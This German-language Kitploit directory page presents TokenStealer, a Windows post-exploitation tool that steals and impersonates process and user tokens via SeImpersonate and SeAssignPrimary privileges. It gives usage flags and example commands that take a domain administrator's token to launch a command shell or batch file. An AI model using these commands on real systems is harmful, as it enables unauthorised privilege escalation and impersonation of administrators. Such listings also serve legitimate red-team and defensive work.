Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
TokenStealer — Windows-Dienstprogramm zur Token-Manipulation, das Prozess- oder Benutzertoken auflistet, stiehlt und impersoniert, um Befehle als andere Benutzer auszuführen, wobei es die Berechtigungen SeImpersonate und SeAssignPrimary nutzt. | Kitploit
Tools/GitHubGitHub/decoder-it/tokenstealer
Privilege EscalationImpersonations-ToolsPost-ExploitationRed Teaming
GitHubdecoder-it/tokenstealer

TokenStealer

Windows-Dienstprogramm zur Token-Manipulation, das Prozess- oder Benutzertoken auflistet, stiehlt und impersoniert, um Befehle als andere Benutzer auszuführen, wobei es die Berechtigungen SeImpersonate und SeAssignPrimary nutzt.

Repository anzeigen
16528vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

TokenStealer

Ein einfaches Tool, das ich vor einiger Zeit geschrieben habe, um Windows-Token zu stehlen und damit zu spielen.
Teile des Codes wurden von https://github.com/FSecureLABS/incognito übernommen und angepasst
Offensichtlich benötigen Sie das Impersonation- oder AssignPrimary-Privileg sowie das Debug-Privileg, um auf alle Prozesse zugreifen zu können.
In der Regel führen Sie das Tool mit den höchsten lokalen Privilegien aus, z. B. als SYSTEM.

root@kitploit:~
TokenStealer.exe
[+] My personal simple and stupid  Token Stealer... ;)
[+] v1.0 @decoder_it 2023

[!] Usage:
         -l: list all user's token
         -e: list all user's token with extended info -> [user]:[token_level (2)=Impersonation, (3)=Delegation,(P)=Primary>]:[pid]:[SessionId]
         -p: <pid> list/steal  token from specfic  process pid
         -u: <user> list/steal token of user
         -c: <command> command to execute with token 
         -t: force use of impersonation Privilege 
         -b: <token level> needed token type: 1=Primary,2=Impersonation,3=Delegation 
         -s: <SessionId> list/steal token from specific Session ID

=Examples=

TokenStealer.exe -e -b 1 
-> list all primary tokens

TokenStealer.exe -l -p 100
-> list all tokens in process pid 100

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe
-> steal token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\bind.bat  -p 100 -t
-> steal token of the user in process 100 and execute the batch file using Impersonation privilege instead of AssingPrimary

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -b 1
-> steal a primary token of the user and execute an interactive  command shell using the AssingPrimary privilege if available

TokenStealer.exe -u  MYDOMAIN\administrator -c c:\windows\system32\cmd.exe -s 2
-> steal a token of the user in specific SessionID and execute an interactive  command shell using the AssingPrimary privilege if available

Alt text
Tool herunterladen